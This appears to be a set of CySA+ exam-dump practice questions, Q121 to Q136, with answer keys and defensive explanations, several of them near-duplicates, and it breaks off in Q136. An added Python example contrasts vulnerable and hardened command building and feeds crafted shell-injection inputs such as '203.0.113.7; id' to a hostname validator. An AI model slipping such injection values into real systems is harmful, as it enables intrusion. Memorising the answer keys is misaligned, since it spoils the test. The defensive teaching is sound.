CompTIA CS0-003 CySA+ Exam Dumps and Practice Test Questions Set 7 Q121-140


Question 121

A SOC analyst notices several endpoints attempting to access a series of suspicious domains over high-numbered ports. DNS logs show frequent queries for pseudo-randomly generated domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The pattern of unusual outbound connections to unknown IP addresses over non-standard ports combined with high-frequency DNS queries to pseudo-randomly generated domains strongly indicates the presence of malware utilizing a domain generation algorithm (DGA). DGAs are a sophisticated technique used by malware to maintain communication with command-and-control (C2) infrastructure while evading traditional detection mechanisms like static blacklists.

DGAs work by algorithmically generating domain names at regular intervals, which the malware attempts to resolve and connect to. Even if some domains are blocked or taken down, others generated by the algorithm remain accessible, ensuring persistent C2 connectivity. The random or high-entropy nature of these domains is a clear indicator that the traffic is anomalous and likely malicious.

Detecting DGA activity requires a multi-layered approach. DNS logs should be analyzed for abnormal query patterns, such as high entropy in domain names, high query volumes, and frequent failures for domain resolution. Network traffic analysis complements this by identifying unusual outbound connections, especially to IP addresses or ports not typically used by legitimate applications. Endpoint telemetry and behavioral monitoring are essential to detect memory-resident malware attempting these connections, which often evade traditional signature-based antivirus solutions.

Mitigation strategies include isolating affected endpoints to prevent further compromise, blocking domains identified as part of DGA activity, and performing thorough malware eradication procedures. Forensic analysis should aim to identify the malware variant, determine the scope of compromise, and identify the attack vector. Reverse-engineering the DGA algorithm can allow analysts to predict future domain names, enabling preemptive blocking and disrupting attacker communications.

Threat intelligence feeds are invaluable in this context. They provide information on known malware families, associated DGA algorithms, and indicators of compromise (IOCs) that can accelerate detection and mitigation. Additionally, implementing defense-in-depth controls—such as endpoint detection and response (EDR), network segmentation, anomaly detection, and strict egress filtering—enhances the organization’s ability to detect and contain DGA-based malware campaigns effectively.

B Standard software update traffic

Legitimate software updates typically communicate with known servers over standard ports. Randomized DNS queries and connections to unknown IP addresses are inconsistent with normal update behavior. Indicators such as high entropy in domain names and unusual frequency of queries strongly differentiate malicious activity from routine software updates.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm services, causing resource exhaustion and service disruption. The scenario described involves covert outbound communication and dynamic domain resolution rather than volumetric traffic intended to degrade service availability. DDoS characteristics differ significantly from C2 communication facilitated by DGAs.

D Misconfigured internal monitoring system

Misconfigurations may cause anomalous traffic patterns, but they rarely produce pseudo-random domain requests combined with outbound connections to unknown external IPs over high-numbered ports. The volume, frequency, and random nature of the DNS queries strongly suggest malicious activity rather than operational misconfiguration.

Question 122

An audit reveals multiple service accounts with administrative privileges have not been accessed for over six months. Which of the following controls would MOST effectively mitigate the associated risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant service accounts with administrative privileges pose a substantial security risk. Attackers often target these accounts to gain unauthorized access or maintain persistence within the network. Automated account deprovisioning is the most effective control because it systematically disables or removes accounts after a defined period of inactivity, ensuring compliance with least privilege principles.

Integration with identity governance and privileged access management (PAM) systems ensures that deprovisioning policies are applied consistently across the organization. Automated deprovisioning also provides audit trails necessary for compliance with regulations such as PCI DSS, HIPAA, and SOX. This approach minimizes human error associated with manual account reviews, which may overlook dormant accounts or fail to remove them in a timely manner.

Automation also complements other security controls, including multi-factor authentication (MFA), role-based access control (RBAC), and anomaly detection. By automatically removing or disabling inactive accounts, organizations reduce the attack surface and prevent potential exploitation of dormant accounts by malicious insiders or external attackers who may obtain credentials through phishing or credential-stuffing attacks.

Regular account audits, combined with automated deprovisioning, provide ongoing assurance that only active accounts retain administrative privileges. Organizations should implement periodic reviews and recertification processes to ensure adherence to least privilege principles. Additionally, monitoring for attempts to access deprovisioned accounts provides early warning of potential insider threats or compromised credentials.

B Increase password complexity requirements for service accounts

While stronger passwords reduce susceptibility to brute-force attacks, they do not address the risks associated with dormant accounts retaining administrative privileges. The account remains a valid attack vector regardless of password strength if it is inactive but enabled.

C Disable all external SSH access

Restricting external SSH reduces potential attack vectors but does not address risks posed by dormant accounts or internal misuse.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not reduce risks associated with dormant administrative accounts that could be leveraged for unauthorized access or lateral movement.

Question 123

During a penetration test, testers exploit a web application vulnerability allowing OS-level command execution via unsanitized input. Which control would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when an application improperly processes user input, allowing execution of arbitrary operating system commands. Server-side input validation ensures that input data meets expected patterns, types, and lengths. Parameterized commands or prepared statements separate user input from executable code, preventing injection attacks.

Secure coding practices, including input validation, output encoding, and using secure frameworks, reduce vulnerabilities at the application layer. Static application security testing (SAST) and dynamic application security testing (DAST) help detect vulnerabilities during development. Web application firewalls (WAFs) provide additional protection by filtering requests that match known attack patterns.

Behavioral monitoring and logging of input validation failures and anomalous execution attempts facilitate early detection of attacks. Remediation includes updating vulnerable code, following secure coding standards, and training developers in best practices. Periodic penetration tests validate the effectiveness of these controls.

TLS encryption secures data in transit but does not prevent command injection. Session timeout management mitigates session hijacking, and firewall rules control traffic but cannot inspect application-level input. Input validation and parameterization provide the primary defense against command execution attacks.

Question 124

A SOC analyst detects that a server has been compromised, and a reverse shell has been established using stolen administrative credentials. Which control would MOST effectively prevent similar attacks in the future?

A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access minimizes the risk of credential misuse. JIT ensures administrative privileges are granted only when required and for limited periods, reducing the window of opportunity for attackers. PAM also provides session logging, monitoring, and auditing, allowing rapid detection of suspicious activities.

Integrating PAM with multi-factor authentication (MFA), endpoint detection and response (EDR), and SIEM solutions strengthens security posture. JIT enforces least privilege while allowing operational workflows to continue, ensuring business continuity. PAM also provides a complete audit trail for regulatory compliance.

Strong passwords reduce brute-force risks but cannot mitigate attacks using compromised credentials. Signature-based antivirus may detect known malware but is ineffective against reverse shells using legitimate tools. Disabling remote access can disrupt operations, whereas PAM with JIT provides secure access without operational disruption.

Question 125

A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IPs. Antivirus scans show no malicious files. Which threat does this BEST describe?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware executes primarily in memory, leveraging legitimate system tools such as PowerShell, WMI, or Office macros. The scenario—obfuscated scripts communicating externally without detectable files—indicates living-off-the-land (LotL) techniques.

Detection requires behavioral monitoring, EDR telemetry, and memory analysis. Fileless malware evades signature-based antivirus because it leaves minimal disk artifacts. Indicators include unusual script execution, abnormal network communications, and deviations from baseline behaviors.

Mitigation involves isolating affected systems, terminating malicious processes, analyzing scripts, and remediating endpoints. Preventive measures include application whitelisting, least privilege enforcement, PowerShell logging, and execution policy restrictions. Threat intelligence integration helps block malicious domains and IPs. Defense-in-depth—combining monitoring, anomaly detection, user training, and incident response—is essential.

Ransomware, phishing, and DDoS do not match the described memory-resident, script-driven, obfuscated activity.

Question 126

A SOC analyst observes multiple endpoints communicating with external IP addresses over uncommon ports. DNS logs show high volumes of queries to pseudo-randomly generated domains. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed scenario strongly indicates the presence of malware using a domain generation algorithm (DGA) for command-and-control (C2) communications. DGAs are designed to generate a large number of pseudo-random domain names at specific intervals, enabling malware to connect to its C2 infrastructure while evading detection mechanisms such as static blacklists, firewalls, and intrusion detection systems.

Indicators of DGA activity include outbound connections to unusual IP addresses over non-standard ports, frequent DNS queries to high-entropy or random-looking domains, and persistent attempts to reach external networks from infected endpoints. Such activity contrasts sharply with normal network behavior, as legitimate applications and services typically communicate with known servers over standard ports and use predictable domain names.

Detecting DGA-based malware requires a multi-layered approach. DNS logs should be analyzed for anomalies, such as high-frequency queries, domains with randomized characters, or repeated failed resolutions. Behavioral analysis and endpoint telemetry can identify memory-resident malware or unauthorized process executions. Analysts may also deploy sandboxing to safely observe the behavior of suspicious scripts or binaries to determine the nature of the malware.

Mitigation involves isolating affected endpoints to prevent further compromise, blocking known malicious domains and IP addresses, and performing comprehensive malware eradication. Forensic investigation should aim to understand the scope of infection, identify the malware variant, determine the attack vector, and document indicators of compromise (IOCs). Reverse engineering the DGA algorithm can enable proactive defenses by predicting domains that malware might generate in the future and blocking them before they are used for C2 communications.

Threat intelligence is critical in identifying DGA-related threats. Integration with threat intelligence feeds allows organizations to identify known malware families, associated algorithms, and previously reported IOCs. Combining this intelligence with monitoring and alerting systems strengthens the organization’s ability to detect and respond to emerging threats.

Additionally, implementing defense-in-depth measures is essential. Network segmentation can prevent malware from moving laterally across critical systems. Endpoint detection and response (EDR) solutions allow monitoring for anomalous behavior on hosts. Strict egress filtering can prevent unauthorized outbound communications, and anomaly-based intrusion detection systems can identify unusual traffic patterns. User training and awareness programs also play a role in preventing initial infection vectors, such as phishing campaigns that may deliver malware.

B Standard software update traffic

Legitimate software updates communicate with known servers using standard ports and predictable domain names. Randomized DNS queries or communication with unusual external IP addresses are inconsistent with routine software update behavior. High-entropy domains and irregular query patterns are strong indicators of malicious activity rather than legitimate update processes.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm services to cause unavailability. They are characterized by volumetric traffic directed at a specific target. The scenario describes covert communication attempts and domain randomization rather than overwhelming service traffic, indicating malware communication rather than a DDoS attack.

D Misconfigured internal monitoring system

Misconfigurations may generate abnormal traffic, but rarely do they produce high-frequency queries to pseudo-random domains combined with outbound connections over uncommon ports. The observed behavior, including the randomness and persistence of queries, strongly points toward malicious activity rather than operational misconfiguration.


Question 127

An internal audit reveals multiple privileged service accounts that have not been used for over six months but retain administrative privileges. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts pose significant security risks. They may be targeted by attackers seeking to gain unauthorized access or maintain persistence within the network. Automated account deprovisioning mitigates this risk by systematically disabling or removing accounts after a defined period of inactivity. This aligns with the principle of least privilege, ensuring only active accounts retain administrative access.

Automation provides consistency and reliability in account management. Manual deprovisioning is prone to human error and may fail to identify dormant accounts in time. By integrating automated deprovisioning with identity governance and privileged access management (PAM) systems, organizations ensure consistent policy enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX.

Automated deprovisioning complements other controls, including multi-factor authentication (MFA), role-based access control (RBAC), and anomaly detection systems. By removing inactive accounts, the organization reduces the attack surface, preventing both internal misuse and external exploitation of dormant credentials. Additionally, continuous monitoring of access attempts, even for deprovisioned accounts, can provide early warning of potential insider threats or compromised credentials.

Periodic recertification and audit processes further reinforce the security posture by ensuring that only necessary accounts maintain elevated privileges. Organizations should also implement alerting for unusual access patterns, such as attempts to log into previously inactive accounts or high-frequency authentication failures.

B Increase password complexity requirements for service accounts

While strong passwords help resist brute-force attacks, they do not eliminate the risks associated with dormant administrative accounts. Even highly complex passwords do not prevent an attacker from leveraging inactive accounts if they remain enabled.

C Disable all external SSH access

Restricting SSH access reduces certain attack vectors but does not mitigate the risk posed by internally compromised or dormant accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not prevent misuse of dormant administrative accounts. The attack surface remains if accounts are left active.

Question 128

During a penetration test, testers exploit a web application vulnerability allowing OS-level command execution via unsanitized input fields. Which control would BEST prevent this type of attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities arise when applications improperly process user input, allowing malicious commands to be executed on the host operating system. Server-side input validation ensures that all input data adheres to expected formats, types, and lengths, preventing malicious commands from executing.

Parameterized commands or prepared statements isolate user input from executable instructions, neutralizing potential injection attacks. Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, significantly reduce the risk of command injection.

Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development, allowing remediation before deployment. Web application firewalls (WAFs) provide an additional layer of defense by filtering and blocking malicious requests that match known attack patterns.

Monitoring anomalous input behavior and logging input validation failures are critical for early detection of attempted command injection attacks. Organizations should establish secure coding standards, perform code reviews, and conduct regular penetration tests to validate the effectiveness of these controls.

TLS encryption ensures secure communication but does not prevent command injection. Session timeout management mitigates session hijacking but is irrelevant to command injection. Firewalls control network traffic but cannot inspect application-layer input effectively; therefore, parameterized commands and server-side input validation remain the primary defense.

B Enforce TLS encryption for all web traffic

TLS encrypts communication but does not mitigate application-layer vulnerabilities. It ensures confidentiality and integrity of data in transit but cannot prevent command execution via unsanitized input.

C Increase session timeout values

Session timeout addresses session hijacking and unauthorized session reuse but does not mitigate input-based command injection.

D Add additional firewall rules at the perimeter

Firewalls provide perimeter protection and traffic filtering but cannot inspect application-layer input, leaving the vulnerability unmitigated.
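For questions 123 and 128, the following added example (not part of the exam material) shows the vulnerable string-built command beside the validated, parameterised form the explanation recommends; the "ping a host" feature, the hostname rule and the sample inputs are assumptions made for this example.

```python
"""The command-injection pattern from the explanation above, in its vulnerable
and hardened forms. Added example, not exam material; the 'ping a host'
feature, the validation rule and the sample inputs are assumptions."""
import re
import subprocess


def build_shell_command_vulnerable(host: str) -> str:
    """Vulnerable: user input is spliced into a string that a shell will parse,
    so any shell metacharacters in `host` become part of the command itself.
    Running this with subprocess.run(..., shell=True) is the bug under discussion."""
    return f"ping -c 1 {host}"


# Hardened step 1: positive (allowlist) validation of what a hostname may look
# like, checked on the server; a denylist of 'bad characters' is easy to miss.
# Labels: alphanumeric start/end, hyphens inside, 1-63 chars; whole name <= 253.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}\Z)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*",
    re.IGNORECASE,
)


def is_valid_hostname(value: str) -> bool:
    return HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(host: str) -> list:
    """Hardened step 2: reject invalid input, then pass the value as one argv
    element. With no shell involved, even an unexpected value is a single
    literal argument to ping, never a second command."""
    if not is_valid_hostname(host):
        raise ValueError(f"rejected hostname: {host!r}")
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    """Execute the parameterised form; shell=False is the default and is spelled out."""
    return subprocess.run(build_ping_argv(host), shell=False,
                          capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    crafted = "203.0.113.7; id"  # constructed input carrying a shell metacharacter
    print("vulnerable builds:", build_shell_command_vulnerable(crafted))
    for candidate in ("host-1.example.com", crafted, "-c", "$(whoami)"):
        try:
            print("hardened accepts:", build_ping_argv(candidate))
        except ValueError as err:
            print("hardened rejects:", err)
```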

Question 129

A SOC analyst detects that a server has been compromised, and a reverse shell has been established using stolen administrative credentials. Which control would MOST effectively prevent similar attacks in the future?

A) Implement privileged access management (PAM) with just-in-time (JIT) access
B) Increase password complexity for all accounts
C) Deploy signature-based antivirus on the server
D) Disable all remote access capabilities

Answer A

Explanation:

A Implement privileged access management (PAM) with just-in-time (JIT) access

PAM with JIT access ensures that administrative privileges are granted only when needed and for a limited duration, reducing the attack window. This minimizes the potential impact of stolen credentials by preventing attackers from maintaining persistent access.

PAM solutions provide detailed session logging, monitoring, and auditing, enabling rapid detection of anomalous activity. Integration with multi-factor authentication (MFA), endpoint detection and response (EDR), and SIEM systems enhances visibility and security enforcement. JIT access enforces least privilege while maintaining operational workflows, allowing legitimate administrative tasks to proceed without unnecessary risk exposure.

Strong passwords alone cannot prevent attackers from using already compromised credentials. Signature-based antivirus may detect known malware but is ineffective against reverse shells using legitimate system tools. Disabling remote access entirely may disrupt business operations, whereas PAM with JIT access offers controlled, secure access without operational interruption.

Question 130

A security analyst observes abnormal PowerShell execution on multiple endpoints. Scripts are obfuscated and communicate with unknown external IPs. Antivirus scans show no malicious files. Which threat does this BEST describe?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and leverages legitimate system tools, such as PowerShell, WMI, or Office macros, to perform malicious activities. Obfuscated scripts communicating with external IPs without creating files on disk indicate living-off-the-land (LotL) techniques.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Signature-based antivirus is largely ineffective because the malware does not leave traditional files on disk. Indicators of compromise include unusual script execution, network anomalies, and deviations from baseline behaviors.

Mitigation strategies include isolating affected endpoints, terminating malicious processes, analyzing scripts for malicious behavior, and remediating compromised systems. Preventive measures include application whitelisting, enforcing least privilege, PowerShell logging, script block logging, transcription, and execution policy restrictions. Threat intelligence helps identify and block malicious domains or IPs.

Living-off-the-land malware evades traditional defenses by exploiting legitimate tools. Defense-in-depth strategies combining anomaly detection, continuous monitoring, user awareness training, and structured incident response are essential to detect and remediate these threats effectively.

Ransomware, phishing, and DDoS attacks do not match the observed memory-resident, script-based, obfuscated activity.

Question 131

A SOC analyst observes a large number of failed login attempts across multiple systems, originating from several external IP addresses. Some attempts use different username variations for the same accounts. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Malware exfiltrating sensitive files
C) Distributed denial-of-service (DDoS) attack
D) Man-in-the-middle (MitM) attack

Answer A

Explanation:

A Brute-force attack targeting user credentials

The described scenario strongly indicates a brute-force attack, a type of attack in which an adversary systematically attempts numerous username and password combinations to gain unauthorized access. Multiple failed login attempts from external IPs across different accounts, especially when attempting variations of known usernames, are classic indicators of this attack type.

Brute-force attacks can be conducted manually but are typically automated using specialized tools and scripts, which can attempt hundreds or thousands of credential combinations per minute. These attacks target weak passwords, reused passwords across systems, and accounts with insufficient security policies. Attackers often employ distributed botnets to rotate IP addresses and avoid detection, making tracking and blocking more difficult.

Mitigation requires a layered approach. Account lockout policies prevent repeated login attempts by temporarily disabling accounts after a threshold of failures. Multi-factor authentication (MFA) ensures that even if a password is compromised, an additional authentication factor is required, significantly reducing the likelihood of unauthorized access. Monitoring failed login attempts and correlating them with threat intelligence feeds allows early detection of coordinated brute-force campaigns.

Rate-limiting authentication attempts at the application or network level can slow down automated attacks. Additionally, implementing IP blacklists or geolocation-based restrictions can block known malicious sources, although sophisticated attackers may use proxy networks to bypass these measures. Regular audits of account activity, enforcement of strong password policies, and user education on password hygiene further reduce susceptibility.

Detection relies on aggregating logs from multiple systems to identify patterns of repeated failed login attempts. Security information and event management (SIEM) solutions can correlate events and generate alerts for potential brute-force activity. Advanced analytics may include anomaly detection models to identify unusual access patterns indicative of credential-based attacks.

B Malware exfiltrating sensitive files

Malware exfiltration involves the unauthorized transfer of data to an external destination, typically using covert channels. While exfiltration may involve anomalous network traffic, it does not generally produce repeated login failures with multiple username variations across multiple systems.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to disrupt availability by overwhelming systems with traffic. They do not involve systematic login attempts or credential testing.

D Man-in-the-middle (MitM) attack

MitM attacks intercept communications between parties, potentially capturing credentials or data. However, MitM attacks typically do not manifest as repeated failed login attempts across multiple systems. The pattern described is indicative of credential brute-forcing rather than interception.

Effective response includes isolating affected systems, resetting potentially compromised accounts, reviewing authentication logs, and enforcing multifactor authentication. Continuous monitoring, combined with preventive measures, minimizes the risk of successful credential compromise.
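The cross-system correlation described above, as an added example that is not part of the exam material: failures are aggregated per source address across hosts and checked against a sliding time window, run over constructed authentication events. The log format, the window and threshold values and the sample events are assumptions made for this example.

```python
"""Cross-system failed-login correlation, the SIEM-style detection the
explanation above describes: failures are aggregated per source address across
hosts and checked against a sliding time window. Added example, not exam
material; the log format, the window and threshold values and the sample
events are assumptions made for this example."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events from three hosts (not real logs). Assumed format:
# <iso-timestamp> host=<name> result=<OK|FAIL> user=<name> src=<ip>
SAMPLE_AUTH_LOG = """\
2024-05-01T12:00:01 host=web01 result=FAIL user=jsmith src=198.51.100.23
2024-05-01T12:00:02 host=web01 result=FAIL user=j.smith src=198.51.100.23
2024-05-01T12:00:02 host=vpn01 result=FAIL user=john.smith src=198.51.100.23
2024-05-01T12:00:03 host=mail01 result=FAIL user=jsmith src=198.51.100.23
2024-05-01T12:00:04 host=web01 result=FAIL user=jsmith_admin src=198.51.100.23
2024-05-01T12:00:05 host=web01 result=FAIL user=adoe src=203.0.113.45
2024-05-01T12:00:06 host=vpn01 result=FAIL user=a.doe src=203.0.113.45
2024-05-01T12:00:07 host=mail01 result=FAIL user=adoe src=203.0.113.45
2024-05-01T12:00:08 host=web01 result=FAIL user=adoe1 src=203.0.113.45
2024-05-01T12:00:09 host=web01 result=FAIL user=adoe src=203.0.113.45
2024-05-01T12:00:10 host=web01 result=FAIL user=adoe src=203.0.113.45
2024-05-01T12:03:00 host=web01 result=FAIL user=bwong src=10.0.0.12
2024-05-01T12:03:40 host=web01 result=OK user=bwong src=10.0.0.12
2024-05-01T12:30:00 host=web01 result=FAIL user=bwong src=10.0.0.12
"""

EVENT_RE = re.compile(r"^(\S+) host=(\S+) result=(\S+) user=(\S+) src=(\S+)$")


def parse_auth_log(text: str):
    """Return event dicts; malformed lines are skipped rather than guessed at."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            ts, host, result, user, src = m.groups()
            events.append({"ts": datetime.fromisoformat(ts), "host": host,
                           "result": result, "user": user, "src": src})
    return events


def peak_failures_in_window(times, window: timedelta) -> int:
    """Largest number of failures from one source inside any `window`-long span."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_brute_force(events, threshold: int = 5,
                       window: timedelta = timedelta(minutes=5)):
    """Sources whose failures across all hosts reach `threshold` inside `window`.
    Correlating per source rather than per host is what exposes a campaign that
    spreads a few attempts over web, VPN and mail to stay under per-host lockout."""
    by_src = defaultdict(lambda: {"times": [], "hosts": set(), "users": set()})
    for e in events:
        if e["result"] != "FAIL":
            continue
        entry = by_src[e["src"]]
        entry["times"].append(e["ts"])
        entry["hosts"].add(e["host"])
        entry["users"].add(e["user"])
    alerts = {}
    for src, entry in by_src.items():
        peak = peak_failures_in_window(entry["times"], window)
        if peak >= threshold:
            alerts[src] = {"peak_failures": peak,
                           "hosts": sorted(entry["hosts"]),
                           "users": sorted(entry["users"])}
    return alerts


if __name__ == "__main__":
    # 10.0.0.12 (two typos half an hour apart, then success) stays below threshold.
    for src, info in detect_brute_force(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(src, info)
```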

Question 132

An analyst detects a spike in network traffic to multiple external IP addresses over high-numbered ports. DNS logs reveal connections to randomly generated domains. Which of the following BEST describes this threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Standard software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The behavior described—high-frequency connections to external IP addresses over unusual ports, combined with DNS queries to randomized domains—is a hallmark of malware employing a domain generation algorithm (DGA). DGAs allow malware to maintain resilient communication channels with C2 servers while evading detection through static blacklists.

DGAs generate pseudo-random domain names on a scheduled basis, enabling malware to attempt connections to domains that are unlikely to be blocked initially. Even if some domains are taken down or blocked, others remain accessible, ensuring persistence. Detection requires correlating network and DNS logs for abnormal traffic patterns, including high query volume, random domain names, and connection attempts to non-standard ports.

Mitigation involves isolating affected hosts, blocking known malicious domains and IPs, and removing malware. Reverse-engineering DGAs can allow predictive blocking of future domains. Threat intelligence integration supports identification of malware families, known algorithms, and associated indicators of compromise (IOCs).

Behavioral monitoring, endpoint detection and response (EDR), and anomaly detection are critical for identifying fileless or memory-resident malware that does not leave traditional artifacts. Implementing network segmentation, strict egress filtering, and application whitelisting enhances defense-in-depth. User training reduces susceptibility to phishing attacks, which are a common initial infection vector.

B Standard software update traffic

Legitimate software updates communicate with known servers over standard ports and predictable domain names. Randomized domains and high-entropy DNS queries are inconsistent with normal update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming systems to disrupt availability, not establishing covert communication with randomized external domains.

D Misconfigured internal monitoring system

Misconfigurations can cause abnormal traffic but rarely produce high-frequency DNS queries to pseudo-random domains combined with connections over non-standard ports.

Question 133

A security audit identifies several privileged accounts that have not been used in over six months. Which control would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant accounts with administrative privileges present a major security risk. Attackers may exploit inactive accounts for unauthorized access or persistence. Automated account deprovisioning systematically disables or removes accounts after inactivity, enforcing least privilege principles.

Integration with identity governance and privileged access management (PAM) ensures consistent policy enforcement, auditing, and regulatory compliance (PCI DSS, HIPAA, SOX). Automated deprovisioning reduces human error associated with manual reviews and improves operational efficiency.

Complementary controls include MFA, RBAC, anomaly detection, and periodic privilege recertification. Monitoring access attempts on disabled accounts provides early indicators of insider threats or credential compromise. Automated deprovisioning ensures inactive accounts are consistently removed, reducing the attack surface and improving security posture.

B Increase password complexity for service accounts

Strong passwords reduce brute-force attack risk but do not mitigate risks from dormant accounts.

C Disable all external SSH access

SSH restrictions limit certain attack vectors but do not address dormant accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate account misuse.

Question 134

During a penetration test, testers exploit unsanitized web input fields, enabling OS-level command execution. Which control BEST prevents this attack?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when an application builds an operating system command from untrusted input and hands it to a shell, so metacharacters in that input (;, |, &&, backticks, $( )) are interpreted as additional commands. Server-side validation enforces the expected type, pattern, and length of each field (a host field must be an IP address or a hostname, nothing else) and must run on the server, since client-side checks are trivially bypassed. "Parameterized commands" means keeping the input out of the executable part of the command: invoke the program directly with an argument vector instead of through a shell string, so the input is only ever a single argument. Prepared statements are the equivalent defense for SQL injection.

Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, reduce vulnerabilities. SAST and DAST identify issues during development, while web application firewalls (WAFs) provide an additional layer of protection. Behavioral monitoring and logging of anomalous input improve early detection.

TLS encrypts communication but does not prevent injection. Session timeout mitigates hijacking but is irrelevant to injection. Firewall rules control network traffic but cannot inspect application input effectively. Input validation remains the primary defense against command injection.

Question 135

A SOC analyst detects obfuscated PowerShell scripts executing on multiple endpoints and communicating with unknown external IPs. Antivirus scans show no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware executes primarily in memory, using legitimate system tools such as PowerShell, WMI, or macros to perform malicious actions. Obfuscated scripts communicating externally without creating files on disk indicate living-off-the-land (LotL) techniques.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Signature-based antivirus is ineffective against fileless malware. Indicators include abnormal script execution, network anomalies, and deviations from baseline behavior.

Mitigation involves isolating endpoints, terminating malicious processes, analyzing scripts, and remediating systems. Preventive measures include application whitelisting, least privilege, PowerShell module and script block logging, Constrained Language Mode, and threat intelligence integration to block malicious domains. Execution policy is a safety feature rather than a security boundary (it is bypassed with a single switch), so it should not be counted on as a control against attackers; logging and allowlisting are what actually expose and stop this activity.

Living-off-the-land malware evades traditional defenses, necessitating a defense-in-depth strategy that includes monitoring, anomaly detection, user training, and structured incident response. Ransomware, phishing, and DDoS do not match the observed memory-resident, obfuscated, script-driven activity.

Question 136

A SOC analyst identifies a sudden increase in failed login attempts across multiple endpoints. These attempts use common username patterns and originate from a range of external IP addresses. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing attack delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The pattern of repeated failed login attempts across multiple endpoints and accounts, particularly using common username patterns, strongly indicates a brute-force attack. Brute-force attacks involve systematically attempting a large number of username-password combinations to gain unauthorized access to systems or accounts. These attacks are often automated using scripts or botnets, enabling attackers to attempt thousands of login attempts in a short period of time.

Brute-force attacks can target both individual accounts and multiple accounts simultaneously. Attackers often rotate IP addresses to evade detection, leveraging botnets or proxy networks. High-frequency failed login attempts, particularly when originating from geographically diverse IPs, are a clear indicator of automated credential attacks rather than user error.

Detection and mitigation require multiple layers of controls. Account lockout policies stop continuous attempts against one account by temporarily disabling it after a set number of failures, but they must be tuned: an aggressive threshold lets an attacker lock out legitimate users, and low-and-slow password spraying (one or two guesses per account across many accounts) stays under per-account limits, so lockout must be paired with per-source rate limiting and monitoring. Implementing multi-factor authentication (MFA) adds a second factor, such as a time-based one-time password (TOTP) or a biometric, so that a guessed password alone is not enough to gain access.

